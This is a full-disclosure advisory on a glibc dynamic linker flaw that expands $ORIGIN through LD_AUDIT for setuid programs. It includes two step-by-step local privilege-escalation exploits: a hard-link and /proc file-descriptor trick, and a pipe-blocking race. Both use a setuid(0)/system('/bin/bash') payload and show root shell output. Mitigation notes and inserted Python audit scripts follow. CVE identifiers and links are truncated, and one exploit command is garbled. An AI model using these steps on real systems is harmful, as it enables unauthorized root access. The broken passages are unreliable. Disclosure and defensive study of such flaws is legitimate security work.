GNU C library dynamic linker - $ORIGIN expansion Vulnerability
from: /?l=full-disclosure&m=072&w=2
The GNU C library dynamic linker expands $ORIGIN in setuid library search path
------------------------------------------------------------------------------
Gruezi, This is CVE-.
The dynamic linker (or dynamic loader) is responsible for the runtime linking of
dynamically linked programs. ld.so operates in two security modes, a permissive
mode that allows a high degree of control over the load operation, and a secure
mode (libc_enable_secure) intended to prevent users from interfering with the
loading of privileged executables.
$ORIGIN is an ELF substitution sequence representing the location of the
executable being loaded in the filesystem hierarchy. The intention is to allow
executables to specify a search path for libraries that is relative to their
location, to simplify packaging without spamming the standard search paths with
single-use libraries.
Note that despite the confusing naming convention, $ORIGIN is specified in a
DT_RPATH or DT_RUNPATH dynamic tag inside the executable itself, not via the
environment (developers would normally use the -rpath ld parameter, or
-Wl,-rpath,$ORIGIN via the compiler driver).
The ELF specification suggests that $ORIGIN be ignored for SUID and SGID
programs:
http://web.archive.org/web/25//developers/gabi//ch5.dynamic.html#substitution
"For security, the dynamic linker does not allow use of $ORIGIN substitution
sequences for set-user and set-group ID programs. For such sequences that
appear within strings specified by DT_RUNPATH dynamic array entries, the
specific search path containing the $ORIGIN sequence is ignored (though other
search paths in the same string are processed). $ORIGIN sequences within a
DT_NEEDED entry or path passed as a parameter to dlopen() are treated as
errors. The same restrictions may be applied to processes that have more than
minimal privileges on systems with installed extended security mechanisms."
However, glibc ignores this recommendation. The attack the ELF designers were
likely concerned about is users creating hardlinks to suid executables in
directories they control and then executing them, thus controlling the
expansion of $ORIGIN.
It is tough to form a thorough complaint about this glibc behaviour however,
as any developer who believes they're smart enough to safely create suid
programs should be smart enough to understand the implications of $ORIGIN
and hard links on load behaviour. The glibc maintainers are some of the
smartest guys in free software, and well known for having a "no hand-holding"
stance on various issues, so I suspect they wanted a better argument than this
for modifying the behaviour (I pointed it out a few years ago, but there was
little interest).
However, I have now discovered a way to exploit this. The origin expansion
mechanism is recycled for use in LD_AUDIT support; although an attempt is made
to prevent it from working there, the check is insufficient.
LD_AUDIT is intended for use with the linker auditing api (see the rtld-audit
manual), and has the usual restrictions for setuid programs as LD_PRELOAD does.
However, $ORIGIN expansion is only prevented if it is not used in isolation.
The codepath that triggers this expansion is
_dl_init_paths() -> _dl_dst_substitute() -> is_dst()
(in the code below DST is dynamic string token)
http://sourceware.org/git/?p=glibc.a=f=elf/dl-load.c;h=aa6d0eb9ccb5b244c01;hb=HEAD#l741
  /* Expand DSTs.  */
  size_t cnt = DL_DST_COUNT (llp, 1);
  if (__builtin_expect (cnt == 0, 1))
    llp_tmp = strdupa (llp);
  else
    {
      /* Determine the length of the substituted string.  */
      size_t total = DL_DST_REQUIRED (l, llp, strlen (llp), cnt);
      /* Allocate the necessary memory.  */
      llp_tmp = (char *) alloca (total + 1);
      llp_tmp = _dl_dst_substitute (l, llp, llp_tmp, 1);
    }
http://sourceware.org/git/?p=glibc.a=f=elf/dl-load.c;h=aa6d0eb9ccb5b244c01;hb=HEAD#l245
  if (__builtin_expect (*name == '$', 0))
    {
      const char *repl = NULL;
      size_t len;
      if ((len = is_dst (start, name, "ORIGIN", is_path,
                         INTUSE(__libc_enable_secure))) != 0)
        repl = l->l_origin;
http://sourceware.org/git/?p=glibc.a=f=elf/dl-load.c;h=aa6d0eb9ccb5b244c01;hb=HEAD#l171
  /* In secure mode, reject the DST unless it stands alone as the first path element.  */
  if (__builtin_expect (secure, 0)
      && ((name[len] != '\0' && (!is_path || name[len] != ':'))
          || (name != start + 1 && (!is_path || name[-2] != ':'))))
    return 0;
As you can see, $ORIGIN is only expanded if it is alone and first in the path.
This makes little sense, and does not appear to be useful even if there were
no security impact. This was most likely the result of an attempt to re-use the
existing DT_NEEDED resolution infrastructure for LD_AUDIT support, accidentally
introducing this error.
Perhaps surprisingly, this error is exploitable.
--------------------
Affected Software
------------------------
At least the following versions have been tested
2.12.1, FC13
2.5, RHEL5 / CentOS5
Other versions are probably affected, possibly via different vectors. I'm aware
several versions of ld.so in common use hit an assertion in dl_open_worker, I
do not know if it's possible to avoid this.
--------------------
Consequences
-----------------------
It is possible to exploit this flaw to execute arbitrary code as root.
Please note, this is a low impact vulnerability that is only of interest to
security professionals and system administrators. End users do not need
to be concerned.
Exploitation would look like the following.
# Create a directory in /tmp we can control.
$ mkdir /tmp/exploit
# Link to an suid binary, thus changing the definition of $ORIGIN.
$ ln /bin/ping /tmp/exploit/target
# Open a file descriptor to the target binary (note: some users are surprised
# to learn exec can be used to manipulate the redirections of the current
# shell if a command is not specified. This is what is happening below).
$ exec 3< /tmp/exploit/target
# This descriptor should now be accessible via /proc.
$ ls -l /proc/$$/fd/3
lr-x------ 1 taviso taviso 64 Oct 15 09:21 /proc/10836/fd/3 -> /tmp/exploit/target*
# Remove the directory previously created
$ rm -rf /tmp/exploit/
# The /proc link should still exist, but now will be marked deleted.
$ ls -l /proc/$$/fd/3
lr-x------ 1 taviso taviso 64 Oct 15 09:21 /proc/10836/fd/3 -> /tmp/exploit/target (deleted)
# Replace the directory with a payload DSO, thus making $ORIGIN a valid target to dlopen().
$ cat > payload.c
void __attribute__((constructor)) init()
{
    setuid(0);
    system("/bin/bash");
}
$ gcc -w -fPIC -shared -o /tmp/exploit payload.c
$ ls -l /tmp/exploit
-rwxrwx--- 1 taviso taviso 4.2K Oct 15 09:22 /tmp/exploit*
# Now force the link in /proc to load $ORIGIN via LD_AUDIT.
$ LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3
sh-4.1# whoami
sh-4.1# id
uid=0(root) gid=500(taviso)
-------------------
Mitigation
-----------------------
It is a good idea to prevent users from creating files on filesystems mounted
without nosuid. The following interesting solution for administrators who
cannot modify their partitioning scheme was suggested to me by Rob Holland
(@robholland):
You can use bind mounts to make directories like /tmp, /var/tmp, etc., nosuid,
for example:
# mount -o bind /tmp /tmp
# mount -o remount,bind,nosuid /tmp /tmp
Be aware of race conditions at boot via crond/atd/etc, and users with
references to existing directories (man lsof), but this may be an acceptable
workaround until a patch is ready for deployment.
(Of course you need to do this everywhere untrusted users can make links to
suid/sgid binaries. find(1) is your friend).
If someone wants to create an init script that would automate this at boot for
their distribution, I'm sure it would be appreciated by other administrators.
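As an added example (not part of the advisory), a small Python check of the kind the mitigation above calls for: it parses a /proc/self/mounts-style table, maps each user-writable directory to the mount it lives on by longest prefix, and reports the ones whose mount lacks nosuid, where a hard link to a set-uid binary keeps its bits. The mount table below is constructed for the demonstration.

```python
import re

# Constructed /proc/self/mounts excerpt: /tmp has been bind-remounted nosuid as in the text, /home has not.
SAMPLE_MOUNTS = """\
/dev/sda1 / ext4 rw,relatime 0 0
tmpfs /dev/shm tmpfs rw,nosuid,nodev 0 0
/dev/sda1 /tmp ext4 rw,nosuid,relatime 0 0
/dev/sdb1 /home ext4 rw,relatime 0 0
/dev/sdc1 /mnt/data\\040disk ext4 rw,relatime 0 0
"""

def parse_mounts(text):
    """Parse mounts(5)-style lines into (mount_point, option set); \\ooo escapes in paths are decoded."""
    mounts = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 4:
            continue
        point = re.sub(r"\\([0-7]{3})", lambda m: chr(int(m.group(1), 8)), parts[1])
        mounts.append((point, set(parts[3].split(","))))
    return mounts

def mount_for(path, mounts):
    """Longest-prefix match; on equal length the later entry wins, as it is the one the kernel shows on top."""
    best = None
    for point, opts in mounts:
        if path == point or path.startswith(point.rstrip("/") + "/"):
            if best is None or len(point) >= len(best[0]):
                best = (point, opts)
    return best

def hardlink_risky(dirs, mounts):
    """Writable directories on a mount without nosuid: a hard link to a set-uid binary made there keeps its bits."""
    risky = []
    for d in dirs:
        m = mount_for(d, mounts)
        if m is not None and "nosuid" not in m[1]:
            risky.append((d, m[0]))
    return risky
```

Feed it the real table with open("/proc/self/mounts").read() and the directories that find(1) reports as writable by untrusted users.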
-------------------
-----------------------
Major distributions should be releasing updated glibc packages shortly.
-------------------
-----------------------
This bug was discovered by Tavis Ormandy.
-------------------
-----------------------
Greetz to Hawkes, Julien, LiquidK, Lcamtuf, Neel, Spoonm, Felix, Robert,
Asirap, Spender, Pipacs, Gynvael, Scarybeasts, Redpig, Kees, Eugene, Bruce D.,
and all my other elite friends and colleagues.
Additional greetz to the openwall guys who saw this problem coming years ago.
They continue to avoid hundreds of security vulnerabilities each year thanks to
their insight into systems security.
-------------------
-----------------------
There are several known techniques to exploit dynamic loader bugs for suid
binaries, the fexecve() technique listed in the Consequences section above is a
modern technique, making use of relatively recent Linux kernel features (it was
first suggested to me by Adam Langley while discussing CVE-, but I
believe Gabriel Campana came up with the same solution independently).
The classic UNIX technique is a little less elegant, but has the advantage that
read access is not required for the target binary. It is rather common for
administrators to remove read access from suid binaries in order to make
attackers work a little harder, so I will document it here for reference.
The basic idea is to create a pipe(), fill it up with junk (pipes have 2^16
bytes capacity on Linux, see the section on "Pipe Capacity" in pipe(7) from the
Linux Programmers Manual), then dup2() it to stderr. Following the dup2(),
anything written to stderr will block, so you simply execve() and then make the
loader print some error message, allowing you to reliably win any race
condition.
LD_DEBUG has always been a a good candidate for getting error messages on
Linux. The behaviour of LD_DEBUG was modified a few years ago in response to
some minor complaints about information leaks, but it can still be used with a
slight modification (I first learned of this technique from a bugtraq posting
by Jim Paris in 2004, http://seclists.org/bugtraq/2004/Aug/281).
The exploit flow for this alternative attack is a little more complicated, but
we can still use the shell to do it (this session is from an FC13 system,
output cleaned up for clarity).
# Almost fill up a pipe with junk, then dup2() it to stderr using redirection.
$ (head -c 65534 /dev/ LD_DEBUG=nonsense LD_AUDIT="\$ORIGIN" /tmp/exploit/target 2>&1) | (sleep 1h; cat) &
# Now ld.so is blocked on write() in the background trying to say "invalid
# debug option", so we are free to manipulate the filesystem.
$ rm -rf /tmp/exploit/
# Put exploit payload in place.
$ gcc -w -fPIC -shared -o /tmp/exploit payload.c
# Clear the pipe by killing sleep, letting cat drain the contents. This will
# unblock the target, allowing it to continue.
$ pkill -n -t $(tty | sed 's#/dev/##') sleep
-bash: line 99: 26929 Terminated
# And now we can take control of a root shell :-)
sh-4.1# id
uid=0(root) gid=500(taviso)
Another technique I'm aware of is setting a ridiculous LD_HWCAP_MASK, then
while the loader is trying to map lots of memory, you have a good chance of
winning any race. I previously found an integer overflow in this feature and
suggested adding LD_HWCAP_MASK to the unsecure vars list, however the glibc
maintainers disagreed and just fixed the overflow.
/ml/libc-hacker/2007-07/msg00001.html
I believe this is still a good idea, and LD_HWCAP_MASK is where I would bet the
next big loader bug is going to be, it's just not safe to let attackers have
that much control over the execution environment of privileged programs.
Finally, some notes on ELF security for newcomers. The following common
conditions are usually exploitable:
- An empty DT_RPATH, i.e. -Wl,-rpath,""
This is a surprisingly common build error, due to variable expansion
failing during the build process.
- A relative, rather than absolute DT_RPATH.
For example, -Wl,-rpath,"lib/foo".
I'll leave it as an exercise for the interested reader to explain why. Remember
to also follow DT_NEEDED dependencies, as dependencies can also declare rpaths
for their dependencies, and so on.
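As an added example, not from the advisory, a stdlib-only Python audit for the two build errors just listed plus $ORIGIN use: it reads DT_RPATH/DT_RUNPATH out of an ELF64 image's .dynamic section and flags empty, relative and $ORIGIN elements (an empty or relative element is searched relative to the process's current working directory). build_sample_elf is a constructed skeleton image for offline testing; run audit_elf on real binaries by passing their bytes.

```python
import struct

DT_NULL, DT_RPATH, DT_RUNPATH, SHT_DYNAMIC = 0, 15, 29, 6

def classify_rpath(value, tag="DT_RPATH"):
    """Flag elements ld.so resolves from the caller's surroundings: empty/relative -> cwd, $ORIGIN -> invocation path."""
    issues = []
    for entry in value.split(":"):
        if entry == "":
            issues.append((entry, f"empty {tag} element (searched in the current directory)"))
        elif "$ORIGIN" in entry or "${ORIGIN}" in entry:
            issues.append((entry, f"{tag} relies on $ORIGIN (hard-link controllable for set-uid binaries)"))
        elif not entry.startswith("/"):
            issues.append((entry, f"relative {tag} element (searched below the current directory)"))
    return issues

def elf_search_paths(data):
    """Return {'DT_RPATH'|'DT_RUNPATH': string} read from a little-endian ELF64 image (stdlib only)."""
    if data[:4] != b"\x7fELF" or data[4] != 2 or data[5] != 1:
        raise ValueError("only little-endian ELF64 is handled here")
    e_shoff, _, _, _, _, e_shentsize, e_shnum, _ = struct.unpack_from("<QIHHHHHH", data, 0x28)
    shdrs = [struct.unpack_from("<IIQQQQIIQQ", data, e_shoff + i * e_shentsize)
             for i in range(e_shnum)]  # name, type, flags, addr, offset, size, link, info, align, entsize
    found = {}
    for sh in shdrs:
        if sh[1] != SHT_DYNAMIC:
            continue
        strtab_off = shdrs[sh[6]][4]  # sh_link of .dynamic is the index of .dynstr
        for pos in range(sh[4], sh[4] + sh[5], 16):  # Elf64_Dyn is 16 bytes
            tag, val = struct.unpack_from("<qQ", data, pos)
            if tag == DT_NULL:
                break
            if tag in (DT_RPATH, DT_RUNPATH):
                start = strtab_off + val
                found["DT_RPATH" if tag == DT_RPATH else "DT_RUNPATH"] = data[start:data.index(b"\x00", start)].decode()
    return found

def audit_elf(data):
    return [i for tag, v in elf_search_paths(data).items() for i in classify_rpath(v, tag)]

def build_sample_elf(rpath, tag=DT_RPATH):
    """Constructed ELF64 skeleton (just .dynamic, .dynstr and a section table) for offline testing; not loadable."""
    dynstr = b"\x00" + rpath.encode() + b"\x00"
    dynamic = struct.pack("<qQ", tag, 1) + struct.pack("<qQ", DT_NULL, 0)
    str_off = 64 + len(dynamic)
    sh_off = str_off + len(dynstr) + (-(str_off + len(dynstr))) % 8
    sh = lambda typ, off, size, link: struct.pack("<IIQQQQIIQQ", 0, typ, 0, 0, off, size, link, 0, 1, 0)
    shdrs = sh(0, 0, 0, 0) + sh(SHT_DYNAMIC, 64, len(dynamic), 2) + sh(3, str_off, len(dynstr), 0)
    hdr = b"\x7fELF\x02\x01\x01" + bytes(9) + struct.pack("<HHIQQQIHHHHHH", 3, 62, 1, 0, 0, sh_off, 0, 64, 0, 0, 64, 3, 0)
    return hdr + dynamic + dynstr + bytes(sh_off - str_off - len(dynstr)) + shdrs
```

It does not follow DT_NEEDED dependencies; rerun it on each library the binary pulls in, as the text recommends.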
-------------------
References
-----------------------
- http://man.cx/ld.so%288%29, The dynamic linker/loader, Linux Programmer's Manual.
- http://man.cx/rtld-audit, The auditing API for the dynamic linker, Linux Programmer's Manual.
- http://man.cx/pipe%287%29, Overview of pipes and FIFOs (Pipe Capacity), Linux Programmer's Manual.
- Linkers and Loaders, John R. Levine, ISBN 1-.
- Partitioning schemes and security, /taviso/blog/show.dml/654574
- CVE- description, http://blog.cr0.org/2009/07/old-school-local-root-vulnerability-in.html
You should subscribe to Linux Weekly News and help support their high standard
of security journalism.
http://lwn.net/
I have a twitter account where I occasionally comment on security topics.